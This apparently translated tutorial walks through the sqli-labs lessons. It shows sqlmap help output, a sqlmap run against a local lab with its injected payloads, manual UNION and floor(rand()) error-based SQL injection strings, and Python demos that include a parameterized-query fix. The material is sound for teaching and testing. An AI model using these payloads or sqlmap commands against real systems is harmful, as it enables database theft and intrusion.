SQL injection is a deep subject; today let's look at a tool.

Since we're using a tool today, let me recommend a particularly strong one: sqlmap.

Still Less-1; if you understood the basics earlier, you should be able to follow this too.

0X01 Introduction to SQLMAP

First, an introduction to sqlmap, a seriously powerful SQL injection tool.

xuan@ubuntu:~$ sqlmap -h
Usage: python sqlmap [options]

Options:
  -h, --help Show basic help message and exit
  -hh Show advanced help message and exit
  --version Show program's version number and exit
  -v VERBOSE Verbosity level: 0-6 (default 1)

  Target:
  At least one of these options has to be provided to define the
  target(s)

  -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
  -g GOOGLEDORK Process Google dork results as target URLs

  Request:
  These options can be used to specify how to connect to the target URL

  --data=DATA Data string to be sent through POST
  --cookie=COOKIE HTTP Cookie header value
  --random-agent Use randomly selected HTTP User-Agent header value
  --proxy=PROXY Use a proxy to connect to the target URL
  --tor Use Tor anonymity network
  --check-tor Check to see if Tor is used properly

  Injection:
  These options can be used to specify which parameters to test for,
  provide custom injection payloads and optional tampering scripts

  -p TESTPARAMETER Testable parameter(s)
  --dbms=DBMS Force back-end DBMS to this value

  Detection:
  These options can be used to customize the detection phase

  --level=LEVEL Level of tests to perform (1-5, default 1)
  --risk=RISK Risk of tests to perform (1-3, default 1)

  Techniques:
  These options can be used to tweak testing of specific SQL injection
  techniques

  --technique=TECH SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
  These options can be used to enumerate the back-end database
  management system information, structure and data contained in the
  tables. Moreover you can run your own SQL statements

  -a, --all Retrieve everything
  -b, --banner Retrieve DBMS banner
  --current-user Retrieve DBMS current user
  --current-db Retrieve DBMS current database
  --passwords Enumerate DBMS users password hashes
  --tables Enumerate DBMS database tables
  --columns Enumerate DBMS database table columns
  --schema Enumerate DBMS schema
  --dump Dump DBMS database table entries
  --dump-all Dump all DBMS databases tables entries
  -D DB DBMS database to enumerate
  -T TBL DBMS database table(s) to enumerate
  -C COL DBMS database table column(s) to enumerate

  Operating system access:
  These options can be used to access the back-end database management
  system underlying operating system

  --os-shell Prompt for an interactive operating system shell
  --os-pwn Prompt for an OOB shell, Meterpreter or VNC

  General:
  These options can be used to set some general working parameters

  --batch Never ask for user input, use the default behaviour
  --flush-session Flush session files for current target

  Miscellaneous:
  --sqlmap-shell Prompt for an interactive sqlmap shell
  --wizard Simple wizard interface for beginner users

The above comes from sqlmap -h; if something is unclear, look it up.

So let's try it. In the terminal, enter sqlmap -u "http://127.0.0.1/sql/Less-1/?id=1" -p id --current-db

xuan@ubuntu:~$ sqlmap -u "http://127.0.0.1/sql/Less-1/?id=1" -p id --current-db
         _
 ___ ___| |_____ ___ ___  {1.0.4.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:11:53

[17:11:54] [INFO] resuming back-end DBMS 'mysql'
[17:11:54] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: id=1' AND 7807=7807 AND 'oGvN'='oGvN

  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))ZXJh) AND 'QbDh'='QbDh

  Type: UNION query
  Title: Generic UNION query (NULL) - 3 columns
  Payload: id=-7937' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,0x516e68626f6c6c4d665346764a57554a5853436b76454547716441456d5349624a704f744d425250,0x716b6a6a71)-- -
---
[17:11:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[17:11:54] [INFO] fetching current database
[17:11:54] [INFO] resumed: security
current database: 'security'
[17:11:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:11:54] [INFO] fetched data logged to text files under '/home/xuan/.sqlmap/output/127.0.0.1'

It finds that the database is security. If your machine can handle it, try -a, which dumps the whole thing, lol.

Now open Less-1's result.txt and take a look.

sqlmap runs the SQL injection tests for us automatically, and on top of that we can study attack methods through these payloads.

0X02 SQL injection lesson one for real: Less-1 (Single quotes - String)

As the previous chapter said, passing id=1' produces an error, so we guess the query is Select * from tables where id = '$id'. We can comment out what follows, and then append all sorts of strange language after id. First let's look at the UNION query.

Pass id=0'union select 1,2,3%23 (note: the first query must return an empty set for the second part to be returned). Why is SQL injection so powerful? Let's review a few odd functions and the SQL databases.

First, the concat and concat_ws functions, which join multiple values together; concat_ws(char(58),1,2,3) is especially handy (char(58) is ':'). user(), database() and version() give basic information about the mysql database.

Second, a description of the tables in the information_schema database:

  • SCHEMATA table
  • TABLES table
  • COLUMNS table

The SCHEMATA table provides information about all databases in the current mysql instance; it is the table behind SHOW DATABASES;

The TABLES table provides information about the tables in a database (including views), describing in detail which SCHEMA a table belongs to, its table type, engine, creation time and so on. The table_name column is the table name; in addition, a table_schema restriction must be added.

The COLUMNS table provides the data types in a table, describing in detail all columns of a table and the information on each column.

First inject for the database name, then the table name, then the columns, and then you have found the data.

As error-based GET string injection, there's no special payload; just go straight at it.
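The guessed Less-1 query and why the left half of the UNION must be empty, as an added example (not code from the post or from sqli-labs): a tiny SQLite stand-in for the users table, queried once by string pasting and once with a bound parameter. The table contents are constructed, SQLite takes `-- ` rather than MySQL's `#` as the comment, and `LIMIT 1` models a page that renders only the first row.

```python
import sqlite3

# Constructed rows standing in for sqli-labs' security.users table.
USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return con


def lookup_vulnerable(con, user_id):
    """The guessed Less-1 query, SELECT * FROM users WHERE id='$id', built by
    pasting the raw parameter into the SQL text. LIMIT 1 models a page that
    renders only the first row. Returns that row, or the error text."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 1"
    try:
        return con.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"error: {exc}"


def lookup_safe(con, user_id):
    """Same lookup with a bound parameter: the value is data, never SQL."""
    return con.execute("SELECT * FROM users WHERE id=? LIMIT 1", (user_id,)).fetchone()


# SQLite's comment is "-- " (MySQL also takes "#", the %23 used in the post).
PROBE = "1'"                                        # the id=1' probe that errors
UNION_AFTER_HIT = "1' UNION ALL SELECT 1,2,3 -- "   # left side still matches a row
UNION_AFTER_MISS = "0' UNION ALL SELECT 1,2,3 -- "  # left side is the empty set


def demo():
    """Runs the three inputs through both lookups and returns the outcomes."""
    con = make_db()
    return {
        "probe": lookup_vulnerable(con, PROBE),
        "union_hit": lookup_vulnerable(con, UNION_AFTER_HIT),
        "union_miss": lookup_vulnerable(con, UNION_AFTER_MISS),
        "safe_probe": lookup_safe(con, PROBE),
        "safe_union": lookup_safe(con, UNION_AFTER_MISS),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:>11}: {outcome}")
```

With id=1 in front the real row wins the single rendered slot; with id=0 the attacker's row is the first one, and the bound-parameter version returns nothing for either input.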

0X03 Less-2 (GET - Error based - Integer based)

No need to close the single quote or comment it out, because here one row is fetched from the result set; if you want all the data you still have to comment out the trailing single quote.

0X04 Less-3 (GET - Error based - Single quotes with twist string)

Single-quote string based; it can also be commented out.

0X05 Less-4 (GET - Error based - Double Quotes - String)

Double quotes can contain single quotes, so when testing, add a double quote to test; in addition, a right parenthesis is needed to close the left parenthesis.

0X06 Less-5 (GET - Double Injection - Single Quotes - String)

Double injection. Double injection is a very serious vulnerability; first let's get to know a few SQL functions:

rand(), floor(), count(), group by

These four are, respectively: take a random value, round down to an integer, count (aggregate), and group.

Now let's use this exercise to understand double injection. First look at a few things in the database: select database() returns the current database, concat concatenates its arguments, and GROUP BY does grouping. When we submit to Less-5 SELECT COUNT(*),COUNT(*),CONCAT((SELECT DATABASE()),FLOOR(RAND()*2)) AS a from information_schema.tables group by a; this produces the error Duplicate entry 'security1' for key '<group_key>'. Work out what that means yourself; the database name is right there. Extracting the table name is the same operation.

Let's analyse the submitted SQL. CONCAT((SELECT DATABASE()),FLOOR(RAND()*2)) returns a concatenated string, which is output grouped; but when a grouping clause is used after the count function, part of the query is shown in the form of an error, which is why our statement displays the database name and thereby creates a SQL injection vulnerability. In production, take care not to output SQL errors casually, to avoid vulnerabilities like this.
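A model of the GROUP BY mechanism behind the Duplicate entry error, added here and not from the post: the group key is evaluated once when looking the group up and again when inserting a new group row, so RAND() can make the insert collide with a key the lookup just missed. The DATABASE() value and the 0/1 draw sequences are constructed; the model shows that the leaked value lives only in the error text, which is why the last sentence above matters.

```python
# Constructed stand-in for SELECT DATABASE() on the sqli-labs box.
DATABASE = "security"


def group_by_count(n_rows, floor_values):
    """Model of how MySQL fills the GROUP BY temp table for
    SELECT COUNT(*), CONCAT((SELECT DATABASE()), FLOOR(RAND()*2)) AS a
    FROM information_schema.tables GROUP BY a.
    The key expression is evaluated once to look a group up and, when no
    group exists yet, evaluated a second time as the new row is inserted.
    RAND() makes the two evaluations independent, so the insert can land on
    a key the lookup just failed to find; MySQL then raises the duplicate-key
    error, and the quoted key carries the DATABASE() value.
    floor_values supplies the successive FLOOR(RAND()*2) results (0 or 1)."""
    draws = iter(floor_values)
    groups = {}
    for _ in range(n_rows):
        key = f"{DATABASE}{next(draws)}"      # evaluation 1: lookup
        if key in groups:
            groups[key] += 1
            continue
        key = f"{DATABASE}{next(draws)}"      # evaluation 2: insert
        if key in groups:
            raise RuntimeError(f"Duplicate entry '{key}' for key '<group_key>'")
        groups[key] = 1
    return groups


def run(n_rows, floor_values):
    """Returns the groups, or the error text an unfiltered page would leak."""
    try:
        return group_by_count(n_rows, floor_values)
    except RuntimeError as exc:
        return str(exc)


if __name__ == "__main__":
    # Constructed draw sequences: 0,1,1,0,1 collides on row 3; 0,0,1,1,1,1 never does.
    print(run(3, [0, 1, 1, 0, 1]))
    print(run(3, [0, 0, 1, 1, 1, 1]))
```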

0X07 Less-6 (GET - Double Injection - Double Quotes - String)

Less-5 with the single quote changed to a double quote.

0X08 Less-7 (GET - Dump into outfile - String)

This is file-based GET string injection; we'll cover it in a few days.

0X08-0X10 Blind injection

Basically, you use ascii and substr to work through the data in SQL one character at a time. Time-based blind injection means sleeping when the condition succeeds, implemented with an if statement. Write the script yourself; doing it with your own hands is how you learn.